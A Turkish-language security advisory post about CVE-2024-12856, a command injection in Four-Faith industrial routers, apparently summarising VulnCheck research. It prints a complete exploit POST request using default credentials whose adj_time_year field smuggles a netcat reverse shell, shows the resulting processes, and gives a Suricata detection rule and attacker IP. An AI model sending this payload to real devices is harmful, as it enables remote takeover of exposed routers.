VulnCheck, Four-Faith endüstriyel yönlendiricilerinde yeni bir kimlik doğrulama sonrası (post-authentication) güvenlik açığının aktif olarak kötüye kullanıldığını gözlemledi. Bu açık, yönlendiricinin varsayılan kimlik bilgileriyle kullanılarak, kimlik doğrulaması yapılmadan uzaktan komut enjeksiyonuna yol açıyor. Bu zafiyet CVE-2024-12856 olarak izleniyor.
Saldırı, özellikle Four-Faith F3x24 ve F3x36 modelleri üzerinde HTTP protokolü kullanılarak ve /apply.cgi endpoint’i üzerinden gerçekleştirilebiliyor. Censys verilerine göre, yaklaşık 15.000 internetten erişilebilir cihaz bu güvenlik açığından etkileniyor. Söz konusu zafiyet, cihazın sistem saatini ayarlamak için adj_time_year parametresinde OS komut enjeksiyonu yapılarak kötüye kullanılabiliyor.
Aşağıda, bu zafiyetin ters shell (reverse shell) açma amacıyla nasıl kullanıldığına dair bir örnek POST isteği yer alıyor:
POST /apply.cgi HTTP/1.1
Host: 192.168.1.1:90
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
Content-Length: 296
Authorization: Basic YWRtaW46YWRtaW4=
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip
adj_time_sec=32&change_action=gozila_cgi&adj_time_day=27&adj_time_mon=10&adj_time_hour=11&adj_time_year=%24%28cd+%2Ftmp%2F%3B+mknod+bOY+p%3Bcat+bOY%7C%2Fbin%2Fsh+-i+2%3E%261%7Cnc+192.168.1.206+1270+%3EbOY%3B+rm+bOY%3B%29&adj_time_min=35&submit_button=index&action=Save&submit_type=adjust_sys_time
Bu tür bir enjeksiyonun cihaz üzerinde sonuçları şu şekilde gözlemlenebilir:
20938 admin 1640 S sh -c rtc_tm ss $(cd /tmp/; mknod WaO p;cat WaO|/bin
20940 admin 1640 S sh -c rtc_tm ss $(cd /tmp/; mknod WaO p;cat WaO|/bin
20942 admin 1636 S cat WaO
20943 admin 1636 S /bin/sh -i
20945 admin 1636 S nc 192.168.1.206 1270
VulnCheck, bu zafiyetin kötüye kullanımını, IP adresi 178.215.238[.]91’den gözlemlemiştir. Bu adres, daha önce CVE-2019-12168 gibi başka bir uzaktan kod çalıştırma açığını sömürmeye çalışan saldırılarda da kullanılmıştır. Ayrıca, bu saldırılarla ilgili olarak, VulnCheck gözlemlediği User-Agent bilgileri ile başka araştırmaların bulgularıyla örtüşmektedir.
Bu zafiyetle ilgili olarak, VulnCheck tarafından geliştirilen aşağıdaki Suricata kuralı, ağ üzerinden CVE-2024-12856’nın tespit edilmesine yardımcı olabilir:
alert http any any -> any any ( \
msg:"VULNCHECK Four-Faith CVE-2024-12856 Exploit Attempt"; \
flow:to_server; \
http.method; content:"POST"; \
http.uri; content:"/apply.cgi"; startswith; \
http.header_names; content:"Authorization"; \
http.request_body; content:"change_action="; \
content:"adjust_sys_time"; \
pcre:"/adj_time_[^=]+=[a-zA-Z0-9]*[^a-zA-Z0-9=]/"; \
classtype:web-application-attack; \
reference:cve,CVE-2024-12856; \
sid:12700438; rev:1;)
VulnCheck, 20 Aralık 2024 tarihinde Four-Faith’e güvenlik açığını bildirmiştir. Şu anda bu zafiyet için herhangi bir yamanın mevcut olup olmadığına dair bilgi bulunmamaktadır. Yama ve etkilenen modeller hakkında daha fazla bilgi almak için Four-Faith ile iletişime geçilmesi gerekmektedir.
Birlikte öğrenelim! 🌐
#CyberSecurity #FourFaith #RouterSecurity #OSCommandInjection #CVE202412856 #NetworkSecurity #GüvenlikAçığı #SiberGüvenlik #IoTSecurity
About the Author
